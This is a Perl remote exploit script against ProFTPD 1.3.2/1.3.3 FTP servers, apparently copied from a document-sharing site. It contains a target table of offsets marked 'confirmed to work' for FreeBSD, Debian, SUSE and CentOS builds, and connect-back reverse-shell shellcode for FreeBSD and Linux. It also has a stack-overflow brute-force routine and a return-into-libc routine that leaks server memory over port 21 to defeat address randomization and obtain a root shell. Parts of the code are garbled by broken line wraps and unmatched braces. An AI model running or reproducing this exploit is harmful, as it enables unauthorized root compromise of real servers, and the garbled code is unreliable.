Documente Academic
Documente Profesional
Documente Cultură
$numtargets = 13;
@targets =
(
# Plain Stack Smashing
#Confirmed to work
["FreeBSD 8.1 i386, ProFTPD 1.3.3a Server (binary)",# PLATFORM SPEC
"FreeBSD", # OPERATING SYSTEM
0, # EXPLOIT STYLE
0xbfbfe000, # OFFSET START
0xbfbfff00, # OFFSET END
1029], # ALIGN
#Confirmed to work
["FreeBSD 8.0/7.3/7.2 i386, ProFTPD 1.3.2a/e/c Server (binary)",
"FreeBSD",
0,
0xbfbfe000,
0xbfbfff00,
1021],
# Return into Libc
#Confirmed to work
["Debian GNU/Linux 5.0, ProFTPD 1.3.2e Server (Plesk binary)",
"Linux",
1, # EXPLOIT STYLE
0x0804CCD4, # write(2) offset
8189, # ALIGN
0], # PADDING
# Confirmed to work
["Debian GNU/Linux 5.0, ProFTPD 1.3.3 Server (Plesk binary)",
"Linux",
1,
0x0804D23C,
4101,
0],
#Confirmed to work
["Debian GNU/Linux 4.0, ProFTPD 1.3.2e Server (Plesk binary)",
"Linux",
1,
0x0804C9A4,
8189,
0],
#Confirmed to work
["Debian Linux Squeeze/sid, ProFTPD 1.3.3a Server (distro binary)",
"Linux",
1,
0x080532D8,
4101,
12],
["SUSE Linux 9.3, ProFTPD 1.3.2e Server (Plesk binary)",
"Linux",
1,
0x0804C9C4,
8189,
0],
["SUSE Linux 10.0/10.3, ProFTPD 1.3.2e Server (Plesk binary)",
"Linux",
1,
0x0804CAA8,
8189,
0],
["SUSE Linux 10.2, ProFTPD 1.3.2e Server (Plesk binary)",
"Linux",
1,
0x0804CBBC,
8189,
0],
["SUSE Linux 11.0, ProFTPD 1.3.2e Server (Plesk binary)",
"Linux",
1,
0x0804CCBC,
8189,
0],
#Confirmed to work
["SUSE Linux 11.1, ProFTPD 1.3.2e Server (Plesk binary)",
"Linux",
1,
0x0804CCE0,
8189,
0],
["SUSE Linux SLES 10, ProFTPD 1.3.2e Server (Plesk binary)",
"Linux",
1,
0x0804CA2C,
8189,
0],
#Confirmed to work
["CentOS 5, ProFTPD 1.3.2e Server (Plesk binary)",
"Linux",
1,
0x0804C290,
8189,
0],
# feel free to add more targets.
);
#freebsd reverse shell port 45295
#setup a netcat on this port ^^
$bsdcbsc =
# setreuid
"\x31\xc0\x31\xc0\x50\x31\xc0\x50\xb0\x7e\x50\xcd\x80".
# connect back :>
"\x31\xc0\x31\xdb\x53\xb3\x06\x53".
"\xb3\x01\x53\xb3\x02\x53\x54\xb0".
"\x61\xcd\x80\x31\xd2\x52\x52\x68".
"\x41\x41\x41\x41\x66\x68\xb0\xef".
"\xb7\x02\x66\x53\x89\xe1\xb2\x10".
"\x52\x51\x50\x52\x89\xc2\x31\xc0".
"\xb0\x62\xcd\x80\x31\xdb\x39\xc3".
"\x74\x06\x31\xc0\xb0\x01\xcd\x80".
"\x31\xc0\x50\x52\x50\xb0\x5a\xcd".
"\x80\x31\xc0\x31\xdb\x43\x53\x52".
"\x50\xb0\x5a\xcd\x80\x31\xc0\x43".
"\x53\x52\x50\xb0\x5a\xcd\x80\x31".
"\xc0\x50\x68\x2f\x2f\x73\x68\x68".
"\x2f\x62\x69\x6e\x89\xe3\x50\x54".
"\x53\x50\xb0\x3b\xcd\x80\x31\xc0".
"\xb0\x01\xcd\x80";
#linux reverse shell port 45295 by bighawk
#setup a netcat on this port ^^
$lnxcbsc =
# setreuid
"\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x90\x90\x90".
# connect back :>
"\x6a\x66".
"\x58".
"\x6a\x01".
"\x5b".
"\x31\xc9".
"\x51".
"\x6a\x01".
"\x6a\x02".
"\x89\xe1".
"\xcd\x80".
"\x68\x7f\x7f\x7f\x7f". # IP
"\x66\x68\xb0\xef". # PORT
"\x66\x6a\x02".
"\x89\xe1".
"\x6a\x10".
"\x51".
"\x50".
"\x89\xe1".
"\x89\xc6".
"\x6a\x03".
"\x5b".
"\x6a\x66".
"\x58".
"\xcd\x80".
"\x87\xf3".
"\x6a\x02".
"\x59".
"\xb0\x3f".
"\xcd\x80".
"\x49".
"\x79\xf9".
"\xb0\x0b".
"\x31\xd2".
"\x52".
"\x68\x2f\x2f\x73\x68".
"\x68\x2f\x62\x69\x6e".
"\x89\xe3".
"\x52".
"\x53".
"\x89\xe1".
"\xcd\x80";
sub exploit1 {
for ($counter=$targets[$ttype][3]; $counter < $targets[$ttype][4]; $counter
+= 250) {
printf("[$target] CURRENT OFFSET = %08x :pP\n", $counter);
$ret = pack("V", $counter);
$align = $targets[$ttype][5];
my $sock = IO::Socket::INET->new(PeerAddr => $target,
PeerPort => 21,
Proto => 'tcp');
$stack = "KCOPERULEZKCOPERULEZKC" . $ret . "\x90" x 500 . $shellcode . "
A" x 10;
$v = <$sock>;
print $sock "\x00" x $align . "\xff" . $stack . "\n";
close($sock);
}
}
#
# uses write(2) to fetch process memory out of the remote box (you can find the
offset using IDA)
# only the write(2) plt entry offset is needed for the exploit to work (and of c
ourse the
# align value)
# once the correct write value is given to the exploit it fetches the memory spa
ce of proftpd.
# with this information the exploit can find function entries and byte values
# relative to the write(2) address.
# once the memory is read out the exploit does the following to circumvent linux
adress space
# randomization:
#
# 1.) calculate mmap64() plt entry
# 2.) seek for assembly instructions in the proftpd memory space relative to wri
te(2)
# such as pop pop ret instructions
# 3.) call mmap64() to map at address 0x10000000 with protection read,write,exec
ute
# 4.) calculate offset for memcpy() which is later used to construct the shellco
de copy routine
# 4.) copy known assembly instructions (which have been found before using the m
emory read)
# to address 0x10000000. these instructions will copy the shellcode from ESP
to 0x10000100
# and make use of the memcpy found before
# 5.) actually jump to the shellcode finder
# 6.) once the shellcode has been copied to 0x10000100 jump to it
# 7.) shellcode gets executed and we have our desired root shell.
sub exploit2 {
printf("[$target] %s :pP\n", $targets[$ttype][0]);
$align = $targets[$ttype][4];
$write_offset = $targets[$ttype][3];
$padding = $targets[$ttype][5];
$|=1;
print "align = $align\n";
print "Seeking for write(2)..\n";
#known good write(2) values
#0x0804C290
#0x0804A85C
#0x0804A234
#0x08052830
#080532D8 proftpd-basic_1.3.3a-4_i386
#08052938 proftpd-basic_1.3.2e-4_i386 (ubunutu)
#0804CCD4 psa-proftpd_1.3.2e-debian5.0.build95100504.17_i386 !!
printf "Using write offset %08x.\n", $write_offset;
$k = $write_offset;
$sock = IO::Socket::INET->new(PeerAddr => $target,
PeerPort => 21,
Proto => 'tcp');
$sock->sockopt(SO_LINGER, pack("ii", 1, 0));
#$x = <stdin>;
$stack = "KCOPERULEZKCOPERULEZKC". "C" x $padding .
pack("V", $k). # write
"\xcc\xcc\xcc\xcc".
"\x01\x00\x00\x00". # fd for write
pack("V", $k). # buffer for write
"\xff\xff\x00\x00"; # length for write
$v = <$sock>;
print $sock "\x00" x $align . "\xff" . $stack . "\n";
vec ($rfd, fileno($sock), 1) = 1;
$timeout = 2;
if (select ($rfd, undef, undef, $timeout) >= 0
&& vec($rfd, fileno($sock), 1))
{
if (read($sock, $buff, 0xffff) == 0xffff) {
printf "\nSUCCESS. write(2) is at %08x\n", $k;
close($sock);
goto lbl1;
}
}
close($sock);
printf "wrong write(2) offset.\n";
exit;
lbl1:
# Once we're here chances are good that we get the root shell
print "Reading memory from server...\n";
my $sock = IO::Socket::INET->new(PeerAddr => $target,
PeerPort => 21,
Proto => 'tcp');
$stack = "KCOPERULEZKCOPERULEZKC" . "C" x $padding .
pack("V", $k). # write
"\xcc\xcc\xcc\xcc".
"\x01\x00\x00\x00". # fd for write
pack("V", $k). # buffer for write
"\xff\xff\x0f\x00"; # length for write
$v = <$sock>;
print $sock "\x00" x $align . "\xff" . $stack . "\n";
read($sock, $buff, 0xfffff);
if (($v = index $buff, "\x5E\x5F\x5D") >= 0) {
$pop3ret = $k + $v;
printf "pop pop pop ret located at %08x\n", $pop3ret;
} else {
print "Could not find pop pop pop ret\n";
exit;
}
if (($v = index $buff, "\x83\xC4\x20\x5B\x5E\x5D\xC3") >= 0) {
$largepopret = $k + $v;
printf "large pop ret located at %08x\n", $largepopret;
} else {
print "Could not find pop pop pop ret\n";
exit;
}
if (($v = index $buff, "\xC7\x44\x24\x08\x03\x00\x00\x00\xC7\x04\x24\x00\x00
\x00\x00\x89\x44\x24\x04") >= 0) {
$addr1 = $k+$v+23;
$mmap64 = unpack("I", substr($buff, $v+20, 4));
$mmap64 = $addr1 - (0xffffffff-$mmap64);
printf "mmap64 is located at %08x\n", $mmap64;
} else {
if (($v = index $buff, "\x89\x44\x24\x10\xA1\xBC\xA5\x0F\x08\x89\x44\x24
\x04\xe8") >= 0) {
$addr1 = $k+$v+17;
$mmap64 = unpack("I", substr($buff, $v+14, 4));
$mmap64 = $addr1 - (0xffffffff-$mmap64);
printf "mmap64 is located at %08x\n", $mmap64;
} else {
print "Could not find mmap64()\n";
exit;
}
}
} else {
if (($v = index $buff, "\x8B\x55\x10\x89\x74\x24\x04\x89\x04\x24\x89\x54
\x24\x08") >= 0) {
$addr1 = $k+$v+18;
$memcpy = unpack("I", substr($buff, $v+15, 4));
$memcpy = $addr1 - (0xffffffff-$memcpy);
printf "memcpy is located at %08x\n", $memcpy;
} else {
print "Could not find memcpy()\n";
exit;
}
}
}
}
}
if (($v = index $buff, "\xfc\x8b") >= 0) {
$byte1 = $k+$v;
printf ("byte1: %08x\n", $byte1);
} else {
print "Could not find a special byte\n";
exit;
}
if (($v = index $buff, "\xf4") >= 0) {
$byte2 = $k+$v;
printf ("byte2: %08x\n", $byte2);
} else {
print "Could not find a special byte\n";
exit;
}
if (($v = index $buff, "\xbf") >= 0) {
$byte3 = $k+$v;
printf ("byte3: %08x\n", $byte3);
} else {
print "Could not find a special byte\n";
exit;
}
if (($v = index $buff, "\x00\x01\x00") >= 0) {
$byte4 = $k+$v;
printf ("byte4: %08x\n", $byte4);
} else {
print "Could not find a special byte\n";
exit;
}
if (($v = index $buff, "\x10") >= 0) {
$byte5 = $k+$v;
printf ("byte5: %08x\n", $byte5);
} else {
print "Could not find a special byte\n";
exit;
}
if (($v = index $buff, "\xB9\x00\x02\x00\x00") >= 0) {
$byte6 = $k+$v;
printf ("byte6: %08x\n", $byte6);
} else {
print "Could not find a special byte\n";
exit;
}